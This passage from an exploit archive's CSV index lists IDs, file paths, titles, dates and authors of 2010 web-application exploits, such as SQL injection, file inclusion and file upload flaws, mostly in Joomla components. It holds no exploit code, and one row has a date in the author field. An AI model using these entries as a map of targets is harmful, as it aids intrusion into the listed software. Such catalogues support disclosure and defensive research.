Injection",2010-03-26,kaMtiEz,php,webapps, -11885,exploits/php/webapps/11885.txt,"Flirt Matching Sms System - SQL Injection",2010-03-26,"Easy Laster",php,webapps, -11888,exploits/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusions",2010-03-26,2010-03-26,php,webapps, -11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,php,webapps, -11892,exploits/php/webapps/11892.txt,"post Card - 'catid' SQL Injection",2010-03-26,"Hussin X",php,webapps, -11894,exploits/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps, -11895,exploits/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps, -11896,exploits/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps, -11897,exploits/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps, -11898,exploits/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps, -11899,exploits/php/webapps/11899.html,"AdaptCMS Lite 1.5 - Arbitrary Add Admin",2010-03-27,ITSecTeam,php,webapps, -11902,exploits/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps, -11903,exploits/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,php,webapps, -11904,exploits/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,php,webapps, -11905,exploits/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)",2010-03-27,JosS,php,webapps, -11906,exploits/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,cp77fk4r,php,webapps, -11908,exploits/php/webapps/11908.txt,"Joomla! Component com_solution - SQL Injection",2010-03-27,"DevilZ TM",php,webapps, -11912,exploits/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection",2010-03-28,"Easy Laster",php,webapps, -11914,exploits/php/webapps/11914.txt,"Joomla! Component com_adds - Blind SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11915,exploits/php/webapps/11915.txt,"Joomla! Component com_tariff - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11916,exploits/php/webapps/11916.txt,"Joomla! Component com_agency - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11917,exploits/php/webapps/11917.txt,"Joomla! Component com_teacher - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11918,exploits/php/webapps/11918.txt,"Joomla! Component com_science - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11919,exploits/php/webapps/11919.txt,"Joomla! Component com_topmenu - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11920,exploits/php/webapps/11920.txt,"Joomla! Component com_personal - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11922,exploits/php/webapps/11922.txt,"Devana - SQL Injection",2010-03-28,Valentin,php,webapps, -11923,exploits/php/webapps/11923.txt,"TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting",2010-03-28,d3v1l,php,webapps, -11924,exploits/php/webapps/11924.txt,"Joomla! Component com_units - SQL Injection",2010-03-28,"DevilZ TM",php,webapps, -11925,exploits/php/webapps/11925.txt,"68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps, -11927,exploits/php/webapps/11927.txt,"Joomla! Component com_departments - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11928,exploits/php/webapps/11928.txt,"Joomla! Component com_business - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11929,exploits/php/webapps/11929.txt,"Joomla! Component com_radio - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11931,exploits/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump",2010-03-29,indoushka,asp,webapps, -11934,exploits/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch 2.09 - SQL Injection",2010-03-29,"Easy Laster",php,webapps, -11935,exploits/php/webapps/11935.txt,"Joomla! Component com_guide - SQL Injection",2010-03-30,"DevilZ TM",php,webapps, -11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,php,webapps, -11939,exploits/php/webapps/11939.txt,"Joomla! Component com_spec - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11940,exploits/php/webapps/11940.txt,"Joomla! Component com_television - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11941,exploits/php/webapps/11941.txt,"Joomla! Component com_items - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11942,exploits/php/webapps/11942.txt,"Joomla! Component com_actions - SQL Injection",2010-03-29,"DevilZ TM",php,webapps, -11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,php,webapps, -11946,exploits/php/webapps/11946.txt,"FaMarket 2 - Authentication Bypass",2010-03-30,indoushka,php,webapps, -11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps, -11948,exploits/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps, -11949,exploits/php/webapps/11949.txt,"Fa-Ads - Authentication Bypass",2010-03-30,indoushka,php,webapps, -11950,exploits/php/webapps/11950.txt,"Fa Home - Authentication Bypass",2010-03-30,indoushka,php,webapps, -11954,exploits/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps, -11960,exploits/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusions",2010-03-30,mat,php,webapps, -11962,exploits/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps, -11963,exploits/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps, -11964,exploits/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps, -11965,exploits/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps, -11967,exploits/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps, -11968,exploits/php/webapps/11968.txt,"Hosting-PHP-dynamic - Authentication Bypass",2010-03-30,indoushka,php,webapps, -11978,exploits/php/webapps/11978.txt,"Joomla! Component DW Graph - Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps, -11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",php,webapps, -11980,exploits/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injections /",2010-03-31,"Easy Laster",php,webapps, -11989,exploits/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps, -11990,exploits/php/webapps/11990.txt,"Joomla! Component com_network - SQL Injection",2010-04-01,"DevilZ TM",php,webapps, -11991,exploits/php/webapps/11991.txt,"Joomla! Component com_tour - SQL Injection",2010-04-01,"DevilZ TM",php,webapps, -11992,exploits/php/webapps/11992.txt,"Joomla! Component com_trading - Blind SQL Injection",2010-04-01,"DevilZ TM",php,webapps, -11993,exploits/php/webapps/11993.txt,"Simply Sites RGV - Local File Inclusion",2010-04-01,"DevilZ TM",php,webapps, -11994,exploits/php/webapps/11994.txt,"DynPG CMS 4.1.0 - Multiple Vulnerabilities",2010-04-01,eidelweiss,php,webapps, -11995,exploits/php/webapps/11995.txt,"ALPHA CMS - Local File Inclusion",2010-04-01,eidelweiss,php,webapps, -11996,exploits/php/webapps/11996.txt,"Joomla! Component EContent - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps, -11997,exploits/php/webapps/11997.txt,"Joomla! Component Jvehicles - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps, -11998,exploits/php/webapps/11998.txt,"Joomla! Component User Status - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps, -11999,exploits/php/webapps/11999.txt,"Joomla! Component webERPcustomer - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps, -12002,exploits/php/webapps/12002.txt,"MusicBox 3.3 - Arbitrary File Upload",2010-04-01,indoushka,php,webapps, -12003,exploits/php/webapps/12003.txt,"onepound Shop / CMS - Cross-Site Scripting / SQL Injection",2010-04-01,Valentin,php,webapps, -12004,exploits/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command",2010-04-01,indoushka,php,webapps, -12005,exploits/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps, -12006,exploits/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps, -12007,exploits/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps, -12009,exploits/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps, -12015,exploits/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps, -12016,exploits/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps, -12017,exploits/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps, -12018,exploits/php/webapps/12018.txt,"DynPG CMS 4.1.0 - 'popup.php' / 'counter.php' Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps, -12019,exploits/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,cr4wl3r,php,webapps, -12021,exploits/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",php,webapps, -12022,exploits/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps, -12026,exploits/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps, -12028,exploits/php/webapps/12028.txt,"PHP-fusion dsmsf Mod Downloads - SQL Injection",2010-04-03,Inj3ct0r,php,webapps, -12029,exploits/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities",2010-04-03,cp77fk4r,asp,webapps, -12031,exploits/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps, -12034,exploits/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps, -12036,exploits/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps, -12037,exploits/php/webapps/12037.txt,"Joomla! Component JP Jobs 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps, -12038,exploits/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps, -12039,exploits/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps, -12041,exploits/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps, -12042,exploits/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps, -12043,exploits/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Add Admin)",2010-04-04,indoushka,php,webapps, -12045,exploits/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps, -12047,exploits/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps, -12048,exploits/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps, -12049,exploits/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps, -12050,exploits/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusions",2010-04-04,cr4wl3r,php,webapps, -12052,exploits/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusions",2010-04-04,mat,php,webapps, -12054,exploits/php/webapps/12054.txt,"Joomla! Component redSHOP 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps, -12055,exploits/php/webapps/12055.txt,"Joomla! Component redTWITTER 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps, -12056,exploits/php/webapps/12056.txt,"Joomla! Component com_wisroyq 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps, -12057,exploits/php/webapps/12057.txt,"Joomla! Component com_press - SQL Injection",2010-04-04,"DevilZ TM",php,webapps, -12058,exploits/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps, -12060,exploits/php/webapps/12060.txt,"Joomla! Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",php,webapps, -12061,exploits/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local/Remote File Inclusion",2010-04-04,eidelweiss,php,webapps, -12062,exploits/php/webapps/12062.txt,"Joomla! Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",php,webapps, -12065,exploits/php/webapps/12065.txt,"Joomla! Component JInventory 1.23.02 - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps, -12066,exploits/php/webapps/12066.txt,"Joomla! Component SVMap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps, -12067,exploits/php/webapps/12067.txt,"Joomla! Component Shoutbox Pro - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps, -12068,exploits/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps, -12069,exploits/php/webapps/12069.txt,"Joomla! Component com_bca-rss-syndicator - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps, -12070,exploits/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps, -12071,exploits/php/webapps/12071.txt,"jevoncms - Local/Remote File Inclusion",2010-04-05,eidelweiss,php,webapps, -12075,exploits/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps, -12076,exploits/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps, -12077,exploits/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12078,exploits/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps, -12082,exploits/php/webapps/12082.txt,"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12083,exploits/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12084,exploits/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12085,exploits/php/webapps/12085.txt,"Joomla! Component Joomla Flickr 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12086,exploits/php/webapps/12086.txt,"Joomla! Component Highslide 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12087,exploits/php/webapps/12087.txt,"Joomla! Component Fabrik 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12088,exploits/php/webapps/12088.txt,"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12089,exploits/php/webapps/12089.txt,"Joomla! Component Appointment 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps, -12092,exploits/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps, -12094,exploits/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps, -12097,exploits/php/webapps/12097.txt,"Joomla! Component XOBBIX 1.0 - 'prodid' SQL Injection",2010-04-06,AntiSecurity,php,webapps, -12098,exploits/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps, -12100,exploits/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps, -12101,exploits/php/webapps/12101.txt,"Joomla! Component aWiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps, -12102,exploits/php/webapps/12102.txt,"Joomla! Component VJDEO 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps, -12105,exploits/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps, -12106,exploits/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps, -12107,exploits/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusions",2010-04-07,eidelweiss,php,webapps, -12108,exploits/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps, -12111,exploits/php/webapps/12111.txt,"Joomla! Component com_webeecomment 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps, -12112,exploits/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)",2010-04-08,AntiSecurity,php,webapps, -12113,exploits/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps, -12115,exploits/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps, -12118,exploits/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps, -12120,exploits/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps, -12121,exploits/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps, -12123,exploits/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps, -12124,exploits/php/webapps/12124.txt,"Joomla! Component Huru Helpdesk - SQL Injection (1)",2010-04-09,bumble_be,php,webapps, -12128,exploits/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps, -12132,exploits/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps, -12133,exploits/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen & NeT_Own3r",multiple,webapps, -12134,exploits/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps, -12135,exploits/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps, -12136,exploits/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection",2010-04-10,c4uR,php,webapps, -12137,exploits/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps, -12138,exploits/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,php,webapps, -12139,exploits/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps, -12140,exploits/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps, -12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps, -12142,exploits/php/webapps/12142.txt,"Joomla! Component TweetLA 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12143,exploits/php/webapps/12143.txt,"Joomla! Component com_ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12144,exploits/php/webapps/12144.txt,"Joomla! Component com_jajobboard - Multiple Local File Inclusions",2010-04-11,AntiSecurity,php,webapps, -12145,exploits/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12146,exploits/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12147,exploits/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12148,exploits/php/webapps/12148.txt,"Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps, -12149,exploits/php/webapps/12149.txt,"Joomla! Component com_spsnewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12150,exploits/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12151,exploits/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps, -12153,exploits/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps, -12155,exploits/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps, -12157,exploits/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps, -12158,exploits/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - 'match' SQL Injection",2010-04-11,"Easy Laster",php,webapps, -12159,exploits/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps, -12160,exploits/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps, -12162,exploits/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps, -12163,exploits/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps, -12164,exploits/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps, -12166,exploits/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12167,exploits/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12168,exploits/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12169,exploits/php/webapps/12169.txt,"Joomla! Component FlashGames 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12170,exploits/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12171,exploits/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12172,exploits/php/webapps/12172.txt,"Joomla! Component CV Maker 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12173,exploits/php/webapps/12173.txt,"Joomla! Component My Files 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12174,exploits/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12175,exploits/php/webapps/12175.txt,"Joomla! Component JoomMail 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12176,exploits/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12177,exploits/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12178,exploits/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12179,exploits/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusions",2010-04-12,cr4wl3r,php,webapps, -12180,exploits/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12181,exploits/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12182,exploits/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps, -12183,exploits/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps, -12184,exploits/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps, -12185,exploits/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps, -12187,exploits/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - Local File Inclusion / Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps, -12190,exploits/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' SQL Injection",2010-04-13,"Don Tukulesto",php,webapps, -12191,exploits/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps, -12192,exploits/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps, -12193,exploits/php/webapps/12193.txt,"Openurgence vaccin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps, -12194,exploits/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps, -12195,exploits/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps, -12197,exploits/asp/webapps/12197.txt,"Mp3 MuZik - Database Disclosure",2010-04-13,indoushka,asp,webapps, -12198,exploits/php/webapps/12198.txt,"Games Script - 'Galore' Backup Dump",2010-04-13,indoushka,php,webapps, -12199,exploits/asp/webapps/12199.txt,"My School Script - Database Disclosure",2010-04-13,indoushka,asp,webapps, -12200,exploits/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,php,webapps, -12212,exploits/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,php,webapps, -12218,exploits/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps, -12219,exploits/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps, -12220,exploits/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps, -12221,exploits/php/webapps/12221.rb,"Bild Flirt System 1.0 - SQL Injection",2010-04-14,"Easy Laster",php,webapps, -12222,exploits/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,php,webapps, -12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,php,webapps, -12224,exploits/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Arbitrary File Upload",2010-04-14,indoushka,php,webapps, -12226,exploits/php/webapps/12226.txt,"Magic Uploader Mini - Arbitrary File Upload",2010-04-14,indoushka,php,webapps, -12227,exploits/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps, -12230,exploits/php/webapps/12230.txt,"Joomla! Component com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12231,exploits/php/webapps/12231.txt,"Joomla! Component com_s5clanroster - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12232,exploits/php/webapps/12232.txt,"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12233,exploits/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12234,exploits/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps, -12235,exploits/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, 